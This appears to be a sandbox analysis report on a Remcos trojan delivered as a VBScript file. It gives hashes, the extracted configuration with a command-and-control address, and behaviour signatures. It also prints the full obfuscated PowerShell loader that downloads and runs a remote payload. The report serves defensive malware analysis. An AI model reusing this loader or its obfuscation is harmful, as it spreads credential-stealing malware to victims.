Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
25-11-2024 06:13
Static task
static1
Behavioral task
behavioral1
Sample
Synliggre.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Synliggre.vbs
Resource
win10v2004-20241007-en
General
-
Target
Synliggre.vbs
-
Size
46KB
-
MD5
e5134e328ff4598e4f301cf33df16bec
-
SHA1
34a3fe3de95733db848f40638e31d628ea8e94da
-
SHA256
f57ea1cae9e6180b2f912e15dac0ca102e30c7b89fc2fb6f041841d09dea78a4
-
SHA512
355133afde717ab39a96bb2ea3ce4a1517624c704184b9c7715753bf8a0dea944ca8c23e4e3289365fd43ec410691865805243528a44efddaddc844ba99ae572
-
SSDEEP
768:cLtPCv/n84ubWF+77WPQLksyMWWwiRghC/JRXenPbUMSvoipHHch7hGEYmzEOms:cL1Cv/8NW06CksCWwugh+YPKoOHchtGk
Malware Config
Extracted
remcos
RemoteHost
154.216.18.157:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-N639VY
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
Processes:
resource yara_rule behavioral1/memory/808-85-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/2140-84-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/2196-91-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral1/memory/808-85-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral1/memory/2140-84-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 6 IoCs
Processes:
WScript.exepowershell.exemsiexec.exeflow pid Process 3 1156 WScript.exe 7 2584 powershell.exe 9 2884 msiexec.exe 10 2884 msiexec.exe 11 2884 msiexec.exe 13 2884 msiexec.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
msiexec.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
WScript.exedescription ioc Process File opened (read-only) \??\Z: WScript.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
msiexec.exepid Process 2884 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exemsiexec.exepid Process 588 powershell.exe 2884 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
msiexec.exedescription pid Process procid_target PID 2884 set thread context of 2140 2884 msiexec.exe 38 PID 2884 set thread context of 808 2884 msiexec.exe 39 PID 2884 set thread context of 2196 2884 msiexec.exe 40 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exemsiexec.exemsiexec.exemsiexec.exemsiexec.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Processes:
WScript.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 WScript.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exemsiexec.exepid Process 2584 powershell.exe 588 powershell.exe 588 powershell.exe 2140 msiexec.exe 2140 msiexec.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
Processes:
powershell.exemsiexec.exepid Process 588 powershell.exe 2884 msiexec.exe 2884 msiexec.exe 2884 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exemsiexec.exedescription pid Process Token: SeDebugPrivilege 2584 powershell.exe Token: SeDebugPrivilege 588 powershell.exe Token: SeDebugPrivilege 2196 msiexec.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
WScript.exepowershell.exemsiexec.exedescription pid Process procid_target PID 1156 wrote to memory of 2584 1156 WScript.exe 31 PID 1156 wrote to memory of 2584 1156 WScript.exe 31 PID 1156 wrote to memory of 2584 1156 WScript.exe 31 PID 588 wrote to memory of 2884 588 powershell.exe 36 PID 588 wrote to memory of 2884 588 powershell.exe 36 PID 588 wrote to memory of 2884 588 powershell.exe 36 PID 588 wrote to memory of 2884 588 powershell.exe 36 PID 588 wrote to memory of 2884 588 powershell.exe 36 PID 588 wrote to memory of 2884 588 powershell.exe 36 PID 588 wrote to memory of 2884 588 powershell.exe 36 PID 588 wrote to memory of 2884 588 powershell.exe 36 PID 2884 wrote to memory of 2140 2884 msiexec.exe 38 PID 2884 wrote to memory of 2140 2884 msiexec.exe 38 PID 2884 wrote to memory of 2140 2884 msiexec.exe 38 PID 2884 wrote to memory of 2140 2884 msiexec.exe 38 PID 2884 wrote to memory of 2140 2884 msiexec.exe 38 PID 2884 wrote to memory of 2140 2884 msiexec.exe 38 PID 2884 wrote to memory of 2140 2884 msiexec.exe 38 PID 2884 wrote to memory of 2140 2884 msiexec.exe 38 PID 2884 wrote to memory of 808 2884 msiexec.exe 39 PID 2884 wrote to memory of 808 2884 msiexec.exe 39 PID 2884 wrote to memory of 808 2884 msiexec.exe 39 PID 2884 wrote to memory of 808 2884 msiexec.exe 39 PID 2884 wrote to memory of 808 2884 msiexec.exe 39 PID 2884 wrote to memory of 808 2884 msiexec.exe 39 PID 2884 wrote to memory of 808 2884 msiexec.exe 39 PID 2884 wrote to memory of 808 2884 msiexec.exe 39 PID 2884 wrote to memory of 2196 2884 msiexec.exe 40 PID 2884 wrote to memory of 2196 2884 msiexec.exe 40 PID 2884 wrote to memory of 2196 2884 msiexec.exe 40 PID 2884 wrote to memory of 2196 2884 msiexec.exe 40 PID 2884 wrote to memory of 2196 2884 msiexec.exe 40 PID 2884 wrote to memory of 2196 2884 msiexec.exe 40 PID 2884 wrote to memory of 2196 2884 msiexec.exe 40 PID 2884 wrote to memory of 2196 2884 msiexec.exe 40
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Synliggre.vbs"1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$sadomasochistic='Oxycalorimeter';;$Crescendi='Charolaiskvgets166';;$Laanefonds169='Renderer';;$Vicoite='svejfningers';;$Lysenes='Outfinds';;$sprogforbistringers=$host.Name;function Burmanske($bebrejdelse){If ($sprogforbistringers) {$Uddykningerne=3} for ($stiftsfrknen=$Uddykningerne;;$stiftsfrknen+=4){if(!$bebrejdelse[$stiftsfrknen]) { break }$Livrekldt+=$bebrejdelse[$stiftsfrknen]}$Livrekldt}function Travhestene($Baretternes){ .($Rehabbed) ($Baretternes)}$stiftsfrknennarching=Burmanske '.onn VreEmhTt.n. E Wsome veBForcTiaL.kri ae,stnsomT';$Bolivias=Burmanske 'splMst oskazGaviOillTrilPiaaski/';$supergroups=Burmanske 'A tTsuplFiksM a1se.2';$Complicatedness=' tr[ Inn FaE nsT yn.AspsTr eskuRAnaVT liLamCAl eTolPKlkOFr IDaanai tsplMDruA man riah ggFe eUndRChe]Gro:sor:Rabs.orEManC pouPo Rsy.iPolTHenyBrdpArtRPinoFigT UnOsupcPraO,akl st= .n$Ls ss ruParpOveeN.nrsaiGAfkr LiO,riU phpAuts';$Bolivias+=Burmanske 'shi5 Di.Mes0Ber sp(T dW FoiFlenFisd Eno FowGalsp o talNstiTCli G a1Ani0End. No0Inc;fo, PhaWProiValn Mu6Dat4Pht;Fo Udxspe6Rep4 Fo;Bob GawrDisvMic:C e1 M.3Kom1 Yi.Vas0Ass)Pit leG IseCapc Flk acoE t/T k2Pyr0Qui1sno0Arb0stu1Ris0Ph 1 Fa InfFTriiJ rrricePlafByboRowxRen/De 1Dyr3Cin1 hi.Inc0';$Afgasses=Burmanske 'LeuU stsseleK.yrPul-Inga MegForeNeeNH.lT';$Ceilings=Burmanske ' BuhTratU at .mp co:p a/D c/PhlbUnp2 icLse5Oxa.sdmiGuicsteuHar/.amgT op .aK,ligMi,T.chZUriUsc WTro/sevTgnarGe astrkPr y H yUroe TrnUdssEll.En xGnas orn';$Botulismen=Burmanske 'Ps >';$Rehabbed=Burmanske 'C iI FoEPoux';$Manacling='sindbillederne';$markman='\Theligonaceae.sai';Travhestene (Burmanske 'Mut$WalG olEngOU,fBrioa FoL ,p:IndrbeseVerdst,IEreR niHusGFr,eMelR GaINo N imG lsTor= la$Page TiN,liVspi:s sAHemPsulPDiad HaaBr Tsv,a Fo+sel$ VimtitaT rrsoeK hamBriaNonn');Travhestene (Burmanske 'ser$samgs al anOshaB spaHopLUdl:ForDNondB,aImulR PrrsleIsa T spE,inRUngEU rnshidPhoeBrn= D.$ arcTrae oI,ndLsp iKarN .og ElsAff.W dssnlPMenlE,oIFe TJon(sto$C.ubAbuost,T,raUInuLExtIdivs rM ,neUrgnUrp)');Travhestene (Burmanske $Complicatedness);$Ceilings=$Ddirriterende[0];$Vatted49=(Burmanske 'Pri$.hegBygLNaboKilbsynasynL Ma:NatFP.eO ivd DyB,eloR aLBauDs de eNsunk anEt.nnUdss A 2C.t2 an6Ud = KaN,eaE VoWVe -F,mO ,iBMisJ PaeFencapeT.se slusspiyC rsAfgtBlaEInhmPro.Tyb$KunsPisTBioIhigFGl,tCirsskrFP.yRPeaK spNstoE JnNsysN ara ForKonC.clhDogI VaNNo g');Travhestene ($Vatted49);Travhestene (Burmanske ' Hy$ ,nFTavoBa,dUd b stoUrol kudJ re vinzorkgemeT pn WosUlt2P,u2Ube6Gyt.PerHInseFavaLufd Die M rGe.sskv[Nit$TabAAphfcomgRepaCa sstesTene.aasTel] il=sil$ .nBOmsotillHysiDubv OpiRega Ves');$Velbevarede=Burmanske 'Emi$maiFUnsoPardAnsbBe oForlFejdPayeTarnMonk EkeRetnThrs og2In,2 Be6sa .NudDspeo tuwddsn TelUn oMedaBundOpmF IniG,olskreP r(Mar$TnkCOpeeKoniTillnahiBa nOssgGavssu., ra$AngHto a Y wN,nkBaceToprPre)';$Hawker=$redirigerings;Travhestene (Burmanske 'Bed$.erg PrlRoloMirBRamaCu LHas:VirsTren.tyasavp PasUnheDef=A n(A otTreeDamsVenTTr.-NedPb,sAso,TArsH ma stj$scaH P,aRaawsi KOmseArbRtyr)');while (!$snapse) {Travhestene (Burmanske 'Ind$Kaig T lNonoCy.b OuaschlB r:DesBVale s,n UnustymBesbBebiTugnAksgUdd=Kak$Bo sInfk Udaf.st Trt TreFilk Whrs aesa,dO es iePelnHu eLeds') ;Travhestene $Velbevarede;Travhestene (Burmanske 'VdesPhaTPagaUndRE etEls-Bars M,lseeeF rERe,PA,s J 4');Travhestene (Burmanske ' i$ CegHyblKakoDe bTarAbudLFri: Mes siN.adAMyrpComs,lvePa =Bla( Mitstee BesRectMc.-O,tP oaPatTHazHsyr ,r$KryhRefaTorwProkOf eEntRVe )') ;Travhestene (Burmanske 'Cre$Radg,jrlP eOAppbs rAAngLc r:OffsEnvpCo.IPlar BliUneTNi Uomss elps ea DaARecVFloiOphRBrekjeeeCowT nc=Cop$smigsu lP,goLegbno aNonlsge:,ecFResi s LBalM.mmBUsvyProEbibrp r+sto+ j% Da$helD saDWaci udRne rFibiGolTBldEsterst.eP,iNEmmdE,ieRej.B scM toAppUO snTelT') ;$Ceilings=$Ddirriterende[$spirituspaavirket]}$Cloy=272326;$Decalomania=30171;Travhestene (Burmanske 'C r$ arg CoL EvOsamB avaAssL ie:svmiExpNTemVErgIfreTComaskatKomIMa o L nOrgs erkM.los lRIdet,juEHounspeeExa Tet=Cof D.oG kuEUdmtOve-Estc HyoDecN ElTDisEPron trtPe sus$CrahHoma emwB tkTipe aR');Travhestene (Burmanske 'Haa$ elgMu l Ovo,ylbselaB alPer: ChO nm rob rlOvegbete adIn eRens o Tai=Ras Ag[Ints smyForsHjat aePopm Ha.surCYpuoResnPytv aseGler ActP s]T.b:Rel:UbeF enrCykoEstms aBLiaa u sPapeTal6Aa 4 PrsP ttEs,rAphi anAmmg .n( Li$s,bIPrinTo,vTini rgt laaRectExciFo osatn abs Prk H,o Mar lot Fles pn,ileBra)');Travhestene (Burmanske 'C r$Be gextlWetoTu b Laa PrlIso:HorsCo uTunPst E D rJa s Noe nkDUndI KvNTryG et ur=s.r Enh[silsPowyBh sEdut.hieFd.MDad. kut poEEucXspit Ch. AbeV dNstrCBruo AnDCatIPilnElegA t] .l: P :AniA Arss mC Coi oriskl. egForE roTpomst ttForRstiIVidNBalgUd (.on$ s OMicMRetb sil AngJerEIndD ae UnsCec)');Travhestene (Burmanske ' D $ UnG .aL TrO igB ,nAstylgri:T.jaC ne,itNTrvDspuRsu.iDe nQuigmi sGamfQueO M RBrusAgll Ena MoGDem=iso$ .tsLenU B psupECraRTvisTheeNucDCeli Tun ngK n.AnisWi.UD.sb cusHydTaphr ecIUnfNB oGNed( k$E,ncNewLDisOD lY G.,Kva$P rdAndEAnecNeuaAn,L RioC uMHjraD,rNF giFibaA,l)');Travhestene $Aendringsforslag;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2584
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$sadomasochistic='Oxycalorimeter';;$Crescendi='Charolaiskvgets166';;$Laanefonds169='Renderer';;$Vicoite='svejfningers';;$Lysenes='Outfinds';;$sprogforbistringers=$host.Name;function Burmanske($bebrejdelse){If ($sprogforbistringers) {$Uddykningerne=3} for ($stiftsfrknen=$Uddykningerne;;$stiftsfrknen+=4){if(!$bebrejdelse[$stiftsfrknen]) { break }$Livrekldt+=$bebrejdelse[$stiftsfrknen]}$Livrekldt}function Travhestene($Baretternes){ .($Rehabbed) ($Baretternes)}$stiftsfrknennarching=Burmanske '.onn VreEmhTt.n. E Wsome veBForcTiaL.kri ae,stnsomT';$Bolivias=Burmanske 'splMst oskazGaviOillTrilPiaaski/';$supergroups=Burmanske 'A tTsuplFiksM a1se.2';$Complicatedness=' tr[ Inn FaE nsT yn.AspsTr eskuRAnaVT liLamCAl eTolPKlkOFr IDaanai tsplMDruA man riah ggFe eUndRChe]Gro:sor:Rabs.orEManC pouPo Rsy.iPolTHenyBrdpArtRPinoFigT UnOsupcPraO,akl st= .n$Ls ss ruParpOveeN.nrsaiGAfkr LiO,riU phpAuts';$Bolivias+=Burmanske 'shi5 Di.Mes0Ber sp(T dW FoiFlenFisd Eno FowGalsp o talNstiTCli G a1Ani0End. No0Inc;fo, PhaWProiValn Mu6Dat4Pht;Fo Udxspe6Rep4 Fo;Bob GawrDisvMic:C e1 M.3Kom1 Yi.Vas0Ass)Pit leG IseCapc Flk acoE t/T k2Pyr0Qui1sno0Arb0stu1Ris0Ph 1 Fa InfFTriiJ rrricePlafByboRowxRen/De 1Dyr3Cin1 hi.Inc0';$Afgasses=Burmanske 'LeuU stsseleK.yrPul-Inga MegForeNeeNH.lT';$Ceilings=Burmanske ' BuhTratU at .mp co:p a/D c/PhlbUnp2 icLse5Oxa.sdmiGuicsteuHar/.amgT op .aK,ligMi,T.chZUriUsc WTro/sevTgnarGe astrkPr y H yUroe TrnUdssEll.En xGnas orn';$Botulismen=Burmanske 'Ps >';$Rehabbed=Burmanske 'C iI FoEPoux';$Manacling='sindbillederne';$markman='\Theligonaceae.sai';Travhestene (Burmanske 'Mut$WalG olEngOU,fBrioa FoL ,p:IndrbeseVerdst,IEreR niHusGFr,eMelR GaINo N imG lsTor= la$Page TiN,liVspi:s sAHemPsulPDiad HaaBr Tsv,a Fo+sel$ VimtitaT rrsoeK hamBriaNonn');Travhestene (Burmanske 'ser$samgs al anOshaB spaHopLUdl:ForDNondB,aImulR PrrsleIsa T spE,inRUngEU rnshidPhoeBrn= D.$ arcTrae oI,ndLsp iKarN .og ElsAff.W dssnlPMenlE,oIFe TJon(sto$C.ubAbuost,T,raUInuLExtIdivs rM ,neUrgnUrp)');Travhestene (Burmanske $Complicatedness);$Ceilings=$Ddirriterende[0];$Vatted49=(Burmanske 'Pri$.hegBygLNaboKilbsynasynL Ma:NatFP.eO ivd DyB,eloR aLBauDs de eNsunk anEt.nnUdss A 2C.t2 an6Ud = KaN,eaE VoWVe -F,mO ,iBMisJ PaeFencapeT.se slusspiyC rsAfgtBlaEInhmPro.Tyb$KunsPisTBioIhigFGl,tCirsskrFP.yRPeaK spNstoE JnNsysN ara ForKonC.clhDogI VaNNo g');Travhestene ($Vatted49);Travhestene (Burmanske ' Hy$ ,nFTavoBa,dUd b stoUrol kudJ re vinzorkgemeT pn WosUlt2P,u2Ube6Gyt.PerHInseFavaLufd Die M rGe.sskv[Nit$TabAAphfcomgRepaCa sstesTene.aasTel] il=sil$ .nBOmsotillHysiDubv OpiRega Ves');$Velbevarede=Burmanske 'Emi$maiFUnsoPardAnsbBe oForlFejdPayeTarnMonk EkeRetnThrs og2In,2 Be6sa .NudDspeo tuwddsn TelUn oMedaBundOpmF IniG,olskreP r(Mar$TnkCOpeeKoniTillnahiBa nOssgGavssu., ra$AngHto a Y wN,nkBaceToprPre)';$Hawker=$redirigerings;Travhestene (Burmanske 'Bed$.erg PrlRoloMirBRamaCu LHas:VirsTren.tyasavp PasUnheDef=A n(A otTreeDamsVenTTr.-NedPb,sAso,TArsH ma stj$scaH P,aRaawsi KOmseArbRtyr)');while (!$snapse) {Travhestene (Burmanske 'Ind$Kaig T lNonoCy.b OuaschlB r:DesBVale s,n UnustymBesbBebiTugnAksgUdd=Kak$Bo sInfk Udaf.st Trt TreFilk Whrs aesa,dO es iePelnHu eLeds') ;Travhestene $Velbevarede;Travhestene (Burmanske 'VdesPhaTPagaUndRE etEls-Bars M,lseeeF rERe,PA,s J 4');Travhestene (Burmanske ' i$ CegHyblKakoDe bTarAbudLFri: Mes siN.adAMyrpComs,lvePa =Bla( Mitstee BesRectMc.-O,tP oaPatTHazHsyr ,r$KryhRefaTorwProkOf eEntRVe )') ;Travhestene (Burmanske 'Cre$Radg,jrlP eOAppbs rAAngLc r:OffsEnvpCo.IPlar BliUneTNi Uomss elps ea DaARecVFloiOphRBrekjeeeCowT nc=Cop$smigsu lP,goLegbno aNonlsge:,ecFResi s LBalM.mmBUsvyProEbibrp r+sto+ j% Da$helD saDWaci udRne rFibiGolTBldEsterst.eP,iNEmmdE,ieRej.B scM toAppUO snTelT') ;$Ceilings=$Ddirriterende[$spirituspaavirket]}$Cloy=272326;$Decalomania=30171;Travhestene (Burmanske 'C r$ arg CoL EvOsamB avaAssL ie:svmiExpNTemVErgIfreTComaskatKomIMa o L nOrgs erkM.los lRIdet,juEHounspeeExa Tet=Cof D.oG kuEUdmtOve-Estc HyoDecN ElTDisEPron trtPe sus$CrahHoma emwB tkTipe aR');Travhestene (Burmanske 'Haa$ elgMu l Ovo,ylbselaB alPer: ChO nm rob rlOvegbete adIn eRens o Tai=Ras Ag[Ints smyForsHjat aePopm Ha.surCYpuoResnPytv aseGler ActP s]T.b:Rel:UbeF enrCykoEstms aBLiaa u sPapeTal6Aa 4 PrsP ttEs,rAphi anAmmg .n( Li$s,bIPrinTo,vTini rgt laaRectExciFo osatn abs Prk H,o Mar lot Fles pn,ileBra)');Travhestene (Burmanske 'C r$Be gextlWetoTu b Laa PrlIso:HorsCo uTunPst E D rJa s Noe nkDUndI KvNTryG et ur=s.r Enh[silsPowyBh sEdut.hieFd.MDad. kut poEEucXspit Ch. AbeV dNstrCBruo AnDCatIPilnElegA t] .l: P :AniA Arss mC Coi oriskl. egForE roTpomst ttForRstiIVidNBalgUd (.on$ s OMicMRetb sil AngJerEIndD ae UnsCec)');Travhestene (Burmanske ' D $ UnG .aL TrO igB ,nAstylgri:T.jaC ne,itNTrvDspuRsu.iDe nQuigmi sGamfQueO M RBrusAgll Ena MoGDem=iso$ .tsLenU B psupECraRTvisTheeNucDCeli Tun ngK n.AnisWi.UD.sb cusHydTaphr ecIUnfNB oGNed( k$E,ncNewLDisOD lY G.,Kva$P rdAndEAnecNeuaAn,L RioC uMHjraD,rNF giFibaA,l)');Travhestene $Aendringsforslag;"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\adlerftkvmfcyhcdxeypckxlmd"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2140
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\kyrwsxeljuxpavzhoplrnwrcnkklt"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:808
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mawpsqxfecpulbnlyzxsqjekvqcuugbc"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3D88DUP12NCAEOO5G6SH.temp
Filesize7KB
MD5eab23a551ef323680a04e051d6bedc7b
SHA1abc07acbf8a1ca52ac5633801745a7dd86a9e9a6
SHA25681a7d8a343d743cc29861a56997ab34c38d514550b5d2ccc723f82caf2b8781b
SHA512c8dbfb969a61918c26f1e709bae3e5638d3ae5afbf19035463d24a6e35287b1d4838e75b697739f69e2b3c4c2998c5d4730829a02197225337f6f905147c213e
-
Filesize
393KB
MD594479799c0f8e7cbfe752471ef01f75a
SHA190483ec8a6fc7a020f0395dd139b733a4931d097
SHA2562e0fc18cb104faf216c7f3cf64dca48399c8fc0ecd351a3c8a628b95d6da00a8
SHA5124be97d7a34b6cfcd351ad9e5281b82ca5ba890d862fda13395da185cb4952b3173f3f6e3da26c28937c9c0482f737b34e61dcf96ca72896bae4db0b1f82c23b4